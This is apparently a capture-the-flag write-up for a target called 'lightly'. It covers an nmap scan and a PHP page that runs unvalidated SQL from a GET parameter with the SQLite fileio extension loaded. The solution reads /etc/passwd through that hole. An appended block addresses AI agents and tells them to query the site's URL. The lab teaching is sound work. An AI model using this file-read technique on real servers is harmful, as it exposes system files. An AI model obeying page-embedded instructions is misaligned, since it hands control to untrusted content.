# lightly There's also a video version, if you want to check it out: [lightly](https://youtu.be/18OGrv16Bsg) **Port Scanning** First we perform a port scan using nmap to identify open ports and the services and their versions running on these ports. ``` ❯ nmap --open -sCV -n -Pn -T5 -v 10.0.160.170 -oN scan PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack nginx 1.18.0 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-favicon: Unknown favicon MD5: 844B11BD64CCAD62F48FD96A886544CA | http-methods: |_ Supported Methods: GET HEAD POST ``` * `-p ` * `-sCV combines the options -sC and -sV.` * nmap help: `-sC: equivalent to --script=default` * `-sV: Probe open ports to determine service/version info` * `-n: Never do DNS resolution` * `-vvv: Increase verbosity level` * `-oN : Output scan in normal format.` The result confirms our expectation: a web server is running on port 80. Let's use a web browser to view the site’s content:

**Code review** \ The content is the code shown in the image above. Let's break it down step by step: ``` loadExtension('libfileio.so'); $db->enableExceptions(true); $results = $db->query($_GET['QUERY']); var_dump($results->fetchArray(SQLITE3_NUM)); } else { highlight_file(__file__); } ``` * The code starts by checking if a GET parameter named 'QUERY' is set using `isset($_GET['QUERY'])` * If 'QUERY' is set: 1. It sets the content type of the response to plain text. 2. It creates a new in-memory SQLite database. 3. It loads an extension called 'libfileio.so'. 4. It enables exceptions for the database operations. 5. It executes the query provided in the GET parameter directly on the database. 6. It fetches the results of the query as a numeric array and dumps them to the output.

* If 'QUERY' is not set it displays the source code of the current file using `highlight_file()`

At this point you may be wondering, "What is libfileio.so???" If you search for it on Google and look at the following result:

Here you will find a post on the SQLite Forum

In this post a user reported an issue with the loadable extension `ext/misc/fileio.c`, which throws the error "undefined symbol sqlite3\_sqlitefileio\_init." Another user suggests renaming the shared library to `libfileio.so` as a solution. If you search for this file on Google and look at the following result:

You find a file written in C with a part that looks interesting:

Basically this code allows us to read files using readfile() and write files using writefile(). **Solution** The main vulnerability here is the lack of validation. The script directly executes any SQL query passed to it through the 'QUERY' GET parameter without any kind of validation or escaping. For solving this target we have to read the /etc/passwd file, with the query `SELECT readfile('/etc/passwd')` this way:

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://b13ss3d.gitbook.io/hackmex-prep/readme/lightly.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.